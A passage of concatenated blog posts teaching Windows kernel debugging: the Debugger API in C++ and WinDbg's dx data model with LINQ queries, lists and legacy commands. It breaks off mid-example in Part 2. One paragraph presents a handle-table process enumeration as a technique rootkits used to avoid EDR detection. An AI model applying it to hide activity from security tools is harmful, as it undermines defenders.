The process iteration is pretty simple — for each process we want to read the ImageFileName value and UniqueProcessId value, and then read the next process pointer from ActiveProcessLinks. Notice that we cannot access any data in the debugger directly. The addresses we have are meaningless in the context of our current process (they are also kernel addresses, and our application is running in user mode and not necessarily on the right machine), and we need to call dataSpaces->ReadVirtual, or any of the other debugger functions that let us read data, to access any of the memory and will have to read these values for each process.

Generally we don’t have to read each value separately, we can also read the whole EPROCESS structure with debugSymbols->ReadTypedDataVirtual for each process and then access the fields by their offsets. But the EPROCESS structure is very large and we only need a few specific fields, so reading the whole structure is pretty wasteful and not necessary in this case.

We now have everything we need to implement our process iteration:

UCHAR imageFileName[15];
ULONG64 uniquePid;
LIST_ENTRY activeProcessLinks;
do
{
//
// Read process name, pid and activeProcessLinks
// for the current process
//
dataSpaces->ReadVirtual(process + imageFileNameOffset,
&imageFileName,
sizeof(imageFileName),
nullptr);
dataSpaces->ReadVirtual(process + uniquePidOffset,
&uniquePid,
sizeof(uniquePid),
nullptr);
dataSpaces->ReadVirtual(process + activeProcessLinksOffset,
&activeProcessLinks,
sizeof(activeProcessLinks),
nullptr);
printf(“Current process name: %s, pid: %d\n”,
imageFileName,
uniquePid);
//
// Get the next process from the list and
// subtract activeProcessLinksOffset
// to get to the start of the EPROCESS.
//
process = (ULONG64)activeProcessLinks.Flink — activeProcessLinksOffset;
} while ((ULONG64)activeProcessLinks.Flink != activeProcessHead);

That’s it, that’s all we need to get this nice output:

Some of you might notice that a few of these process names look incomplete. This is because the ImageFileName field only has the first 15 bytes of the process name, while the full name is saved in an OBJECT_NAME_INFORMATION structure (which is actually just a UNICODE_STRING) in SeAuditProcessCreationInfo.ImageFileName. But in this post I wanted to keep things simple so we’ll use ImageFileName here.

Now we only have one last part left — being good developers and cleaning up after ourselves:

if (debugClient != nullptr)
{
debugClient->EndSession(DEBUG_END_ACTIVE_DETACH);
debugClient->Release();
}
if (debugSymbols != nullptr)
{
debugSymbols->Release();
}
if (dataSpaces != nullptr)
{
dataSpaces->Release();
}
if (debugControl != nullptr)
{
debugControl->Release();
}

This was a very brief, but hopefully helpful, introduction to the debugger API. There are endless more options available with this, looking at DbgEng.h or at the official documentation should reveal a lot more. I hope you all find this as useful as I do and will find new and interesting things to use it for.


Windows Debugger API — The End of Versioned Structures was originally published in The Startup on Medium, where people are continuing the conversation by highlighting and responding to this story.

WinDbg — the Fun Way: Part 1

WinDbg — the Fun Way: Part 1

A while ago, WinDbg added support for a new debugger data model, a change that completely changed the way we can use WinDbg. No more horrible MASM commands and obscure syntax. No more copying addresses or parameters to a Notepad file so that you can use them in the next commands without scrolling up. No more running the same command over and over with different addresses to iterate over a list or an array.

This is part 1 of this guide, because I didn’t actually think anyone would read through 8000 words of me explaining WinDbg commands. So you get 2 posts of 4000 words! That’s better, right?

In this first post we will learn the basics of how to use this new data model — using custom registers and new built-in registers, iterating over objects, searching them and filtering them and customizing them with anonymous types. And finally we will learn how to parse arrays and lists in a much nicer and easier way than you’re used to.

And in the net post we’ll learn the more complicated and fancier methods and features that this data model gives us. Now that we all know what to expect and grabbed another cup of coffee, let’s start!

This data model, accessed in WinDbg through the dx command, is an extremely powerful tool, able to define custom variables, structures, functions and use a wide range of new capabilities. It also lets us search and filter information with LINQ — a natural query language built on top of database languages such as SQL.

This data model is documented and even has usage examples on GitHub. Additionally, all of its modules have documentation that can be viewed in the debugger with dx -v <method> (though you will get the same documentation if you run dx <method> without the -v flag):

dx -v Debugger.Utility.Collections.FromListEntry
Debugger.Utility.Collections.FromListEntry [FromListEntry(ListEntry, [<ModuleName | ModuleObject>], TypeName, FieldExpression) — Method which converts a LIST_ENTRY specified by the ‘ListEntry’ parameter of types whose name is specified by the string ‘TypeName’ and whose embedded links within that type are accessed via an expression specified by the string ‘FieldExpression’ into a collection object. If an optional module name or object is specified, the type name is looked up in the context of such module]

There has also been some external documentation, but I felt like there were things that needed further explanation and that this feature is worth more attention than it receives.

Custom Registers

First, NatVis adds the option for custom registers. Kind of like MASM had @$t1, @$t2, @$t3 , etc. Only now you can call them whatever name you want, and they can have a type of your choice:

dx @$myString = “My String”
dx @$myInt = 123

We can see all our variables with dx @$vars and remove them with dx @$vars.Remove("var name"), or clear all with @$vars.Clear(). We can also use dx to show handle more complicated structures, such as an EPROCESS. As you might know, symbols in public PDBs don’t have type information. With the old debugger, this wasn’t always a problem, since in MASM, there’s no types anyway, and we could use the poi command to dereference a pointer.

0: kd> dt nt!_EPROCESS poi(nt!PsInitialSystemProcess)
+0x000 Pcb : _KPROCESS
+0x2e0 ProcessLock : _EX_PUSH_LOCK
+0x2e8 UniqueProcessId : (null)
...

But things got messier when the variable isn’t a pointer, like with PsIdleProcess:

0: kd> dt nt!_KPROCESS @@masm(nt!PsIdleProcess)
+0x000 Header : _DISPATCHER_HEADER
+0x018 ProfileListHead : _LIST_ENTRY [ 0x00000048`0411017e - 0x00000000`00000004 ]
+0x028 DirectoryTableBase : 0xffffb10b`79f08010
+0x030 ThreadListHead : _LIST_ENTRY [ 0x00001388`00000000 - 0xfffff801`1b401000 ]
+0x040 ProcessLock : 0
+0x044 ProcessTimerDelay : 0
+0x048 DeepFreezeStartTime : 0xffffe880`00000000
...

We first have to use explicit MASM operators to get the address of PsIdleProcess and then print it as an EPROCESS. With dx we can be smarter and cast symbols directly, using c-style casts. But when we try to cast nt!PsInitialSystemProcess to a pointer to an EPROCESS:

dx @$systemProc = (nt!_EPROCESS*)nt!PsInitialSystemProcess
Error: No type (or void) for object at Address 0xfffff8074ef843a0

We get an error.

Like I mentioned, symbols have no type. And we can’t cast something with no type. So we need to take the address of the symbol, and cast it to a pointer to the type we want (In this case, PsInitialSystemProcess is already a pointer to an EPROCESS so we need to cast its address to a pointer to a pointer to an EPROCESS).

dx @$systemProc = *(nt!_EPROCESS**)&nt!PsInitialSystemProcess

Now that we have a typed variable, we can access its fields like we would do in C:

0: kd> dx @$systemProc->ImageFileName
@$systemProc->ImageFileName               [Type: unsigned char [15]]
[0] : 0x53 [Type: unsigned char]
[1] : 0x79 [Type: unsigned char]
[2] : 0x73 [Type: unsigned char]
[3] : 0x74 [Type: unsigned char]
[4] : 0x65 [Type: unsigned char]
[5] : 0x6d [Type: unsigned char]
[6] : 0x0 [Type: unsigned char]

And we can cast that to get a nicer output:

dx (char*)@$systemProc->ImageFileName
(char*)@$systemProc->ImageFileName                 : 0xffffc10c8e87e710 : "System" [Type: char *]

We can also use ToDisplayString to cast it from a char* to a string. We have two options — ToDisplayString("s"), which will cast it to a string and keep the quotes as part of the string, or ToDisplayString("sb"), which will remove them:

dx ((char*)@$systemProc->ImageFileName).ToDisplayString("s")
((char*)@$systemProc->ImageFileName).ToDisplayString("s") : "System"
Length : 0x8
dx ((char*)@$systemProc->ImageFileName).ToDisplayString("sb")
((char*)@$systemProc->ImageFileName).ToDisplayString("sb") : System
Length : 0x6

Built-in Registers

This is fun, but for processes (and a few other things) there is an even easier way. Together with NatVis’ implementation in WinDbg we got some “free” registers already containing some useful information — curframe, curprocess, cursession, curstack and curthread. It’s not hard to guess their contents by their names, but let’s take a look:

@$curframe

Gives us information about the current frame. I never actually used it myself, but it might be useful:

dx -r1 @$curframe.Attributes
@$curframe.Attributes                
InstructionOffset : 0xfffff8074ebda1e1
ReturnOffset : 0xfffff80752ad2b61
FrameOffset : 0xfffff80751968830
StackOffset : 0xfffff80751968838
FuncTableEntry : 0x0
Virtual : 1
FrameNumber : 0x0

@$curprocess

A container with information about the current process. This is not an EPROCESS (though it does contain it). It contains easily accessible information about the current process, like its threads, loaded modules, handles, etc.

dx @$curprocess
@$curprocess                 : System [Switch To]
KernelObject [Type: _EPROCESS]
Name : System
Id : 0x4
Handle : 0xf0f0f0f0
Threads
Modules
Environment
Devices
Io

In KernelObject we have the EPROCESS, but we can also use the other fields. For example, we can access all the handles held by the process through @$curprocess.Io.Handles, which will lead us to an array of handles, indexed by their handle number:

dx @$curprocess.Io.Handles
@$curprocess.Io.Handles                
[0x4]
[0x8]
[0xc]
[0x10]
[0x14]
[0x18]
[0x1c]
[0x20]
[0x24]
[0x28]
...

System has a lot of handles, these are just the first few! Let’s just take a look at the first one (which we can also access through @$curprocess.Io.Handles[0x4]):

dx @$curprocess.Io.Handles.First()
@$curprocess.Io.Handles.First()                
Handle : 0x4
Type : Process
GrantedAccess : Delete | ReadControl | WriteDac | WriteOwner | Synch | Terminate | CreateThread | VMOp | VMRead | VMWrite | DupHandle | CreateProcess | SetQuota | SetInfo | QueryInfo | SetPort
Object [Type: _OBJECT_HEADER]

We can see the handle, the type of object the handle is for, its granted access, and we even have a pointer to the object itself (or its object header, to be precise)!

There are plenty more things to find under this register, and I encourage you to investigate them, but I will not show all of them.

By the way, have we mentioned already that dx allows tab completion?

@$cursession

As its name suggests, this register gives us information about the current debugger session:

dx @$cursession
@$cursession                 : Remote KD: KdSrv:Server=@{<Local>},Trans=@{NET:Port=55556,Key=1.2.3.4,Target=192.168.251.21}
Processes
Id : 0
Devices
Attributes

So, we can get information about our debugger session, which is always fun. But there are more useful things to be found here, such as the Processes field, which is an array of all processes, indexed by their PID. Let’s pick one of them:

dx @$cursession.Processes[0x1d8]
@$cursession.Processes[0x1d8]                 : smss.exe [Switch To]
KernelObject [Type: _EPROCESS]
Name : smss.exe
Id : 0x1d8
Handle : 0xf0f0f0f0
Threads
Modules
Environment
Devices
Io

Now we can get all that useful information about every single process! We can also search through processes by filtering them based on a search (such as by their name, specific modules loaded into them, strings in their command line, etc. But I will explain all of that later.

@$curstack

This register contains a single field — frames — which shows us the current stack in an easily-handled way:

dx @$curstack.Frames
@$curstack.Frames                
[0x0] : nt!DbgBreakPointWithStatus + 0x1 [Switch To]
[0x1] : kdnic!TXTransmitQueuedSends + 0x125 [Switch To]
[0x2] : kdnic!TXSendCompleteDpc + 0x14d [Switch To]
[0x3] : nt!KiProcessExpiredTimerList + 0x169 [Switch To]
[0x4] : nt!KiRetireDpcList + 0x4e9 [Switch To]
[0x5] : nt!KiIdleLoop + 0x7e [Switch To]

@$curthread

Gives us information about the current thread, just like @$curprocess:

dx @$curthread
@$curthread                 : nt!DbgBreakPointWithStatus+0x1 (fffff807`4ebda1e1)  [Switch To]
KernelObject [Type: _ETHREAD]
Id : 0x0
Stack
Registers
Environment

It contains the ETHREAD in KernelObject, but also contains the TEB in Environment, and can show us the thread ID, stack and registers.

dx @$curthread.Registers
@$curthread.Registers                
User
Kernel
SIMD
FloatingPoint

We have them conveniently separated to user, kernel, SIMD and FloatingPoint registers, and we can look at each separately:

dx -r1 @$curthread.Registers.Kernel
@$curthread.Registers.Kernel
cr0 : 0x80050033
cr2 : 0x207b8f7abbe
cr3 : 0x6d4002
cr4 : 0x370678
cr8 : 0xf
gdtr : 0xffff9d815ffdbfb0
gdtl : 0x57
idtr : 0xffff9d815ffd9000
idtl : 0xfff
tr : 0x40
ldtr : 0x0
kmxcsr : 0x1f80
kdr0 : 0x0
kdr1 : 0x0
kdr2 : 0x0
kdr3 : 0x0
kdr6 : 0xfffe0ff0
kdr7 : 0x400

xcr0 : 0x1f

Searching and Filtering

A very useful thing that NatVis allows us to do, which we briefly mentioned before, is searching, filtering and ordering information in an SQL-like way through Select, Where, OrderBy and more.

For example, let’s try to find all the processes that don’t enable high entropy ASLR. This information is stored in the EPROCESS->MitigationFlags field, and the value for HighEntropyASLREnabled is 0x20 (all values can be found here and in the public symbols).

First, we’ll declare a new register with that value, just to make things more readable:

0: kd> dx @$highEntropyAslr = 0x20
@$highEntropyAslr = 0x20 : 32

And then create our query to iterate over all processes and only pick ones where the HighEntropyASLREnabled bit is not set:

dx -r1 @$cursession.Processes.Where(p => (p.KernelObject.MitigationFlags & @$highEntropyAslr) == 0)
@$cursession.Processes.Where(p => (p.KernelObject.MitigationFlags & @$highEntropyAslr) == 0)                
[0x910] : spoolsv.exe [Switch To]
[0xb40] : IpOverUsbSvc.exe [Switch To]
[0x1610] : explorer.exe [Switch To]
[0x1d8c] : OneDrive.exe [Switch To]

Or we can check the flag directly through MitigationFlagsValues and get the same results:

dx -r1 @$cursession.Processes.Where(p => (p.KernelObject.MitigationFlagsValues.HighEntropyASLREnabled == 0))
@$cursession.Processes.Where(p => (p.KernelObject.MitigationFlagsValues.HighEntropyASLREnabled == 0))                
[0x910] : spoolsv.exe [Switch To]
[0xb40] : IpOverUsbSvc.exe [Switch To]
[0x1610] : explorer.exe [Switch To]
[0x1d8c] : OneDrive.exe [Switch To]

We can also use Select() to only show certain attributes of things we iterate over. Here we choose to see only the number of threads each process has:

dx @$cursession.Processes.Select(p => p.Threads.Count())
@$cursession.Processes.Select(p => p.Threads.Count())                
[0x0] : 0x6
[0x4] : 0xeb
[0x78] : 0x4
[0x1d8] : 0x5
[0x244] : 0xe
[0x294] : 0x8
[0x2a0] : 0x10
[0x2f8] : 0x9
[0x328] : 0xa
[0x33c] : 0xd
[0x3a8] : 0x2c
[0x3c0] : 0x8
[0x3c8] : 0x8
[0x204] : 0x15
[0x300] : 0x1d
[0x444] : 0x3f
...

We can also see everything in decimal by adding , d to the end of the command, to specify the output format (we can also use b for binary, o for octal or s for string):

dx @$cursession.Processes.Select(p => p.Threads.Count()), d
@$cursession.Processes.Select(p => p.Threads.Count()), d                
[0] : 6
[4] : 235
[120] : 4
[472] : 5
[580] : 14
[660] : 8
[672] : 16
[760] : 9
[808] : 10
[828] : 13
[936] : 44
[960] : 8
[968] : 8
[516] : 21
[768] : 29
[1092] : 63
...

Or, in a slightly more complicated example, see the ideal processor for each thread running in a certain process (I chose a process at random, just to see something that is not the System process):

dx -r1 @$cursession.Processes[0x1b2c].Threads.Select(t => t.Environment.EnvironmentBlock.CurrentIdealProcessor.Number)
@$cursession.Processes[0x1b2c].Threads.Select(t => t.Environment.EnvironmentBlock.CurrentIdealProcessor.Number)                
[0x1b30] : 0x1 [Type: unsigned char]
[0x1b40] : 0x2 [Type: unsigned char]
[0x1b4c] : 0x3 [Type: unsigned char]
[0x1b50] : 0x4 [Type: unsigned char]
[0x1b48] : 0x5 [Type: unsigned char]
[0x1b5c] : 0x0 [Type: unsigned char]
[0x1b64] : 0x1 [Type: unsigned char]

We can also use OrderBy to get nicer results, for example to get a list of all processes sorted by alphabetical order:

dx -r1 @$cursession.Processes.OrderBy(p => p.Name)
@$cursession.Processes.OrderBy(p => p.Name)                
[0x1848] : ApplicationFrameHost.exe [Switch To]
[0x0] : Idle [Switch To]
[0xb40] : IpOverUsbSvc.exe [Switch To]
[0x106c] : LogonUI.exe [Switch To]
[0x754] : MemCompression [Switch To]
[0x187c] : MicrosoftEdge.exe [Switch To]
[0x1b94] : MicrosoftEdgeCP.exe [Switch To]
[0x1b7c] : MicrosoftEdgeSH.exe [Switch To]
[0xb98] : MsMpEng.exe [Switch To]
[0x1158] : NisSrv.exe [Switch To]
[0x1d8c] : OneDrive.exe [Switch To]
[0x78] : Registry [Switch To]
[0x1ed0] : RuntimeBroker.exe [Switch To]
...

If we want them in a descending order, we can use OrderByDescending.

But what if we want to pick more than one attribute to see? There is a solution for that too.

Anonymous Types

We can declare a type of our own, that will be unnamed and only used in the scope of our query, using this syntax: Select(x => new { var1 = x.A, var2 = x.B, ...}).

We’ll try it out on one of our previous examples. Let’s say for each process we want to show a process name and its thread count:

dx @$cursession.Processes.Select(p => new {Name = p.Name, ThreadCount = p.Threads.Count()})
@$cursession.Processes.Select(p => new {Name = p.Name, ThreadCount = p.Threads.Count()})                
[0x0]
[0x4]
[0x78]
[0x1d8]
[0x244]
[0x294]
[0x2a0]
[0x2f8]
[0x328]
...

But now we only see the process container, not the actual information. To see the information itself we need to go one layer deeper, by using -r2. The number specifies the output recursion level. The default is -r1, -r0 will show no output, -r2 will show two levels, etc.

dx -r2 @$cursession.Processes.Select(p => new {Name = p.Name, ThreadCount = p.Threads.Count()})
@$cursession.Processes.Select(p => new {Name = p.Name, ThreadCount = p.Threads.Count()})                
[0x0]
Name : Idle
ThreadCount : 0x6
[0x4]
Name : System
ThreadCount : 0xeb
[0x78]
Name : Registry
ThreadCount : 0x4
[0x1d8]
Name : smss.exe
ThreadCount : 0x5
[0x244]
Name : csrss.exe
ThreadCount : 0xe
[0x294]
Name : wininit.exe
ThreadCount : 0x8
[0x2a0]
Name : csrss.exe
ThreadCount : 0x10
...

This already looks much better, but we can make it look even nicer with the new grid view, accessed through the -g flag:

dx -g @$cursession.Processes.Select(p => new {Name = p.Name, ThreadCount = p.Threads.Count()})
Output of dx -g @$cursession.Processes.Select(p => new {Name = p.Name, ThreadCount = p.Threads.Count()})

OK, this just looks awesome. And yes, these headings are clickable and will sort the table!

And if we want to see the PIDs and thread numbers in decimal we can just add , d to the end of the command:

dx -g @$cursession.Processes.Select(p => new {Name = p.Name, ThreadCount = p.Threads.Count()}),d

Arrays and Lists

DX also gives us a new, much easier way, to handle arrays and lists with new syntax.
Let’s look at arrays first, where the syntax is dx *(TYPE(*)[Size])<pointer to array start>.

For this example, we will dump the contents on PsInvertedFunctionTable, which contains an array of up to 256 cached modules in its TableEntry field.

First, we will get the pointer of this symbol and cast it to _INVERTED_FUNCTION_TABLE:

dx @$inverted = (nt!_INVERTED_FUNCTION_TABLE*)&nt!PsInvertedFunctionTable
@$inverted = (nt!_INVERTED_FUNCTION_TABLE*)&nt!PsInvertedFunctionTable                 : 0xfffff8074ef9b010 [Type: _INVERTED_FUNCTION_TABLE *]
[+0x000] CurrentSize : 0xbe [Type: unsigned long]
[+0x004] MaximumSize : 0x100 [Type: unsigned long]
[+0x008] Epoch : 0x19e [Type: unsigned long]
[+0x00c] Overflow : 0x0 [Type: unsigned char]
[+0x010] TableEntry [Type: _INVERTED_FUNCTION_TABLE_ENTRY [256]]

Now we can create our array. Unfortunately, the size of the array has to be static and can’t use a register, so we need to input it manually, based on CurrentSize (or just set it to 256, which is the size of the whole array). And we can use the grid view to print it nicely:

dx -g @$tableEntry = *(nt!_INVERTED_FUNCTION_TABLE_ENTRY(*)[0xbe])@$inverted->TableEntry
Output of dx -g @$tableEntry = *(nt!_INVERTED_FUNCTION_TABLE_ENTRY(*)[0xbe])@$inverted->TableEntry

Alternatively, we can use the Take() method, which receives a number and prints that amount of elements from a collection, and get the same result:

dx -g @$inverted->TableEntry->Take(@$inverted->CurrentSize)

We can also do the same thing to see the UserInvertedFunctionTable (right after we switch to user that’s not System), starting from nt!KeUserInvertedFunctionTable:

dx @$inverted = *(nt!_INVERTED_FUNCTION_TABLE**)&nt!KeUserInvertedFunctionTable
@$inverted = *(nt!_INVERTED_FUNCTION_TABLE**)&nt!KeUserInvertedFunctionTable                 : 0x7ffa19e3a4d0 [Type: _INVERTED_FUNCTION_TABLE *]
[+0x000] CurrentSize : 0x2 [Type: unsigned long]
[+0x004] MaximumSize : 0x200 [Type: unsigned long]
[+0x008] Epoch : 0x6 [Type: unsigned long]
[+0x00c] Overflow : 0x0 [Type: unsigned char]
[+0x010] TableEntry [Type: _INVERTED_FUNCTION_TABLE_ENTRY [256]]
dx -g @$inverted->TableEntry->Take(@$inverted->CurrentSize)

And of course we can use Select() , Where() or other functions to filter, sort or select only specific fields for our output and get tailored results that fit exactly what we need.

The next thing to handle is lists — Windows is full of linked lists, you can find them everywhere. Linking processes, threads, modules, DPCs, IRPs, and more.

Fortunately the new data model has a very useful Debugger method - Debugger.Utiilty.Collections.FromListEntry, which takes in a linked list head, type and name of the field in this type containing the LIST_ENTRY structure, and will return a container of all the list contents.

So, for our example let’s dump all the handle tables in the system. Our starting point will be the symbol nt!HandleTableListHead, the type of the objects in the list is nt!_HANDLE_TABLE and the field linking the list is HandleTableList:

dx -r2 Debugger.Utility.Collections.FromListEntry(*(nt!_LIST_ENTRY*)&nt!HandleTableListHead, "nt!_HANDLE_TABLE", "HandleTableList")
Debugger.Utility.Collections.FromListEntry(*(nt!_LIST_ENTRY*)&nt!HandleTableListHead, "nt!_HANDLE_TABLE", "HandleTableList")                
[0x0] [Type: _HANDLE_TABLE]
[+0x000] NextHandleNeedingPool : 0x3400 [Type: unsigned long]
[+0x004] ExtraInfoPages : 0 [Type: long]
[+0x008] TableCode : 0xffff8d8dcfd18001 [Type: unsigned __int64]
[+0x010] QuotaProcess : 0x0 [Type: _EPROCESS *]
[+0x018] HandleTableList [Type: _LIST_ENTRY]
[+0x028] UniqueProcessId : 0x4 [Type: unsigned long]
[+0x02c] Flags : 0x0 [Type: unsigned long]
[+0x02c ( 0: 0)] StrictFIFO : 0x0 [Type: unsigned char]
[+0x02c ( 1: 1)] EnableHandleExceptions : 0x0 [Type: unsigned char]
[+0x02c ( 2: 2)] Rundown : 0x0 [Type: unsigned char]
[+0x02c ( 3: 3)] Duplicated : 0x0 [Type: unsigned char]
[+0x02c ( 4: 4)] RaiseUMExceptionOnInvalidHandleClose : 0x0 [Type: unsigned char]
[+0x030] HandleContentionEvent [Type: _EX_PUSH_LOCK]
[+0x038] HandleTableLock [Type: _EX_PUSH_LOCK]
[+0x040] FreeLists [Type: _HANDLE_TABLE_FREE_LIST [1]]
[+0x040] ActualEntry [Type: unsigned char [32]]
[+0x060] DebugInfo : 0x0 [Type: _HANDLE_TRACE_DEBUG_INFO *]
[0x1] [Type: _HANDLE_TABLE]
[+0x000] NextHandleNeedingPool : 0x400 [Type: unsigned long]
[+0x004] ExtraInfoPages : 0 [Type: long]
[+0x008] TableCode : 0xffff8d8dcb651000 [Type: unsigned __int64]
[+0x010] QuotaProcess : 0xffffb90a530e4080 [Type: _EPROCESS *]
[+0x018] HandleTableList [Type: _LIST_ENTRY]
[+0x028] UniqueProcessId : 0x78 [Type: unsigned long]
[+0x02c] Flags : 0x10 [Type: unsigned long]
[+0x02c ( 0: 0)] StrictFIFO : 0x0 [Type: unsigned char]
[+0x02c ( 1: 1)] EnableHandleExceptions : 0x0 [Type: unsigned char]
[+0x02c ( 2: 2)] Rundown : 0x0 [Type: unsigned char]
[+0x02c ( 3: 3)] Duplicated : 0x0 [Type: unsigned char]
[+0x02c ( 4: 4)] RaiseUMExceptionOnInvalidHandleClose : 0x1 [Type: unsigned char]
[+0x030] HandleContentionEvent [Type: _EX_PUSH_LOCK]
[+0x038] HandleTableLock [Type: _EX_PUSH_LOCK]
[+0x040] FreeLists [Type: _HANDLE_TABLE_FREE_LIST [1]]
[+0x040] ActualEntry [Type: unsigned char [32]]
[+0x060] DebugInfo : 0x0 [Type: _HANDLE_TRACE_DEBUG_INFO *]
...

See the QuotaProcess field? That field points to the process that this handle table belongs to. Since every process has a handle table, this allows us to enumerate all the processes on the system in a way that’s not widely known. This method has been used by rootkits in the past to enumerate processes without being detected by EDR products. So to implement this we just need to Select() the QuotaProcess from each entry in our handle table list. To create a nicer looking output we can also create an anonymous container with the process name, PID and EPROCESS pointer:

dx -r2 (Debugger.Utility.Collections.FromListEntry(*(nt!_LIST_ENTRY*)&nt!HandleTableListHead, "nt!_HANDLE_TABLE", "HandleTableList")).Select(h => new { Object = h.QuotaProcess, Name = ((char*)h.QuotaProcess->ImageFileName).ToDisplayString("s"), PID = (__int64)h.QuotaProcess->UniqueProcessId})
(Debugger.Utility.Collections.FromListEntry(*(nt!_LIST_ENTRY*)&nt!HandleTableListHead, "nt!_HANDLE_TABLE", "HandleTableList")).Select(h => new { Object = h.QuotaProcess, Name = ((char*)h.QuotaProcess->ImageFileName).ToDisplayString("s"), PID = (__int64)h.QuotaProcess->UniqueProcessId})
[0x0]            : Unspecified error (0x80004005)
[0x1]
Object : 0xffffb10b70906080 [Type: _EPROCESS *]
Name : "Registry"
PID : 120 [Type: __int64]
[0x2]
Object : 0xffffb10b72eba0c0 [Type: _EPROCESS *]
Name : "smss.exe"
PID : 584 [Type: __int64]
[0x3]
Object : 0xffffb10b76586140 [Type: _EPROCESS *]
Name : "csrss.exe"
PID : 696 [Type: __int64]
[0x4]
Object : 0xffffb10b77132140 [Type: _EPROCESS *]
Name : "wininit.exe"
PID : 772 [Type: __int64]
[0x5]
Object : 0xffffb10b770a2080 [Type: _EPROCESS *]
Name : "csrss.exe"
PID : 780 [Type: __int64]
[0x6]
Object : 0xffffb10b7716d080 [Type: _EPROCESS *]
Name : "winlogon.exe"
PID : 852 [Type: __int64]
...

PID : 852 [Type: __int64]

The first result is the table belonging to the System process and it does not have a QuotaProcess, which is the reason this query returns an error for it. But it should work perfectly for every other entry in the array. If we want to make our output prettier, we can filter out entries where QuotaProcess == 0 before we do the Select():

dx -r2 (Debugger.Utility.Collections.FromListEntry(*(nt!_LIST_ENTRY*)&nt!HandleTableListHead, “nt!_HANDLE_TABLE”, “HandleTableList”)).Where(h => h.QuotaProcess != 0).Select(h => new { Object = h.QuotaProcess, Name = ((char*)h.QuotaProcess->ImageFileName).ToDisplayString("s"), PID = h.QuotaProcess->UniqueProcessId})

As we already showed before, we can also print this list in a graphic view or use any LINQ queries to make the output match our needs.

This is the end of our first part, but don’t worry, the second part is right here, and it contains all the fancy new dx methods such as a new disassembler, defining our own methods, conditional breakpoints that actually work, and more.

WinDbg — the Fun Way: Part 2

WinDbg — the Fun Way: Part 2

Welcome to part 2 of me trying to make you enjoy debugging on Windows (wow, I’m a nerd)!

In the first part we got to know the basics of the new debugger data model — Using the new objects, having custom registers, searching and filtering output, declaring anonymous types and parsing lists and arrays. In this part we will learn how to use legacy commands with dx, get to know the amazing new disassembler, create synthetic methods and types, see the fancy changes to breakpoints and use the filesystem from within the debugger.

This sounds like a lot. Because it is. So let’s start!

Legacy Commands

This new data model completely changes the debugging experience. But sometimes you do need to use one of the old commands or extensions that we all got used to, and that don’t have a matching functionality under dx.

But we can still use these under dx with Debugger.Utility.Control.ExecuteCommand, which lets us run a legacy command as part of a dx query. For example, we can use the legacy u command to unassemble the address that is pointed to by RIP in our second stack frame.

Since dx output is decimal by default and legacy commands only take hex input we first need to convert it to hex using ToDisplayString("x"):

dx Debugger.Utility.Control.ExecuteCommand("u " + @$curstack.Frames[1].Attributes.InstructionOffset.ToDisplayString("x"))
Debugger.Utility.Control.ExecuteCommand("u " + @$curstack.Frames[1].Attributes.InstructionOffset.ToDisplayString("x"))                
[0x0] : kdnic!TXTransmitQueuedSends+0x125:
[0x1] : fffff807`52ad2b61 4883c430 add rsp,30h
[0x2] : fffff807`52ad2b65 5b pop rbx
[0x3] : fffff807`52ad2b66 c3 ret
[0x4] : fffff807`52ad2b67 4c8d4370 lea r8,[rbx+70h]
[0x5] : fffff807`52ad2b6b 488bd7 mov rdx,rdi
[0x6] : fffff807`52ad2b6e 488d4b60 lea rcx,[rbx+60h]
[0x7] : fffff807`52ad2b72 4c8b15d7350000 mov r10,qword ptr [kdnic!_imp_ExInterlockedInsertTailList (fffff807`52ad6150)]
[0x8] : fffff807`52ad2b79 e8123af8fb call nt!ExInterlockedInsertTailList (fffff807`4ea56590)

Another useful legacy command is !irp. This command supplies us with a lot of information about IRPs, so no need to work hard to recreate it with dx.

So we will try to run !irp for all IRPs in lsass.exe process. Let’s walk through that:

First, we need to find the process container for lsass.exe. We already know how to do that using Where(). Then we’ll pick the first process returned. Usually there should only be one lsass anyway, unless there are server silos on the machine:

dx @$lsass = @$cursession.Processes.Where(p => p.Name == “lsass.exe”).First()

Then we need to iterate over IrpList for each thread in the process and get the IRPs themselves. We can easily do that with FromListEntry() that we’ve seen already. Then we only pick the threads that have IRPs in their list:

dx -r4 @$irpThreads = @$lsass.Threads.Select(t => new {irp = Debugger.Utility.Collections.FromListEntry(t.KernelObject.IrpList, "nt!_IRP", "ThreadListEntry")}).Where(t => t.irp.Count() != 0)
@$irpThreads = @$lsass.Threads.Select(t => new {irp = 
Debugger.Utility.Collections.FromListEntry(t.KernelObject.IrpList, "nt!_IRP", "ThreadListEntry")}).Where(t => t.irp.Count() != 0)
[0x384]
irp
[0x0] [Type: _IRP]
[<Raw View>] [Type: _IRP]
IoStack : Size = 12, Current IRP_MJ_DIRECTORY_CONTROL / 0x2 for Device for "\FileSystem\Ntfs"
CurrentThread : 0xffffb90a59477080 [Type: _ETHREAD *]
[0x1] [Type: _IRP]
[<Raw View>] [Type: _IRP]
IoStack : Size = 12, Current IRP_MJ_DIRECTORY_CONTROL / 0x2 for Device for "\FileSystem\Ntfs"
CurrentThread : 0xffffb90a59477080 [Type: _ETHREAD *]

We can stop here for a moment, click on IoStack for one of the IRPs (or run with -r5 to see all of them) and get the stack in a nice container we can work with:

dx @$irpThreads.First().irp[0].IoStack
@$irpThreads.First().irp[0].IoStack                 : Size = 12, Current IRP_MJ_DIRECTORY_CONTROL / 0x2 for Device for "\FileSystem\Ntfs"
[0] : IRP_MJ_CREATE / 0x0 for {...} [Type: _IO_STACK_LOCATION]
[1] : IRP_MJ_CREATE / 0x0 for {...} [Type: _IO_STACK_LOCATION]
[2] : IRP_MJ_CREATE / 0x0 for {...} [Type: _IO_STACK_LOCATION]
[3] : IRP_MJ_CREATE / 0x0 for {...} [Type: _IO_STACK_LOCATION]
[4] : IRP_MJ_CREATE / 0x0 for {...} [Type: _IO_STACK_LOCATION]
[5] : IRP_MJ_CREATE / 0x0 for {...} [Type: _IO_STACK_LOCATION]
[6] : IRP_MJ_CREATE / 0x0 for {...} [Type: _IO_STACK_LOCATION]
[7] : IRP_MJ_CREATE / 0x0 for {...} [Type: _IO_STACK_LOCATION]
[8] : IRP_MJ_CREATE / 0x0 for {...} [Type: _IO_STACK_LOCATION]
[9] : IRP_MJ_CREATE / 0x0 for {...} [Type: _IO_STACK_LOCATION]
[10] : IRP_MJ_DIRECTORY_CONTROL / 0x2 for Device for "\FileSystem\Ntfs" [Type: _IO_STACK_LOCATION]
[11] : IRP_MJ_DIRECTORY_CONTROL / 0x2 for Device for "\FileSystem\FltMgr" [Type: _IO_STACK_LOCATION]

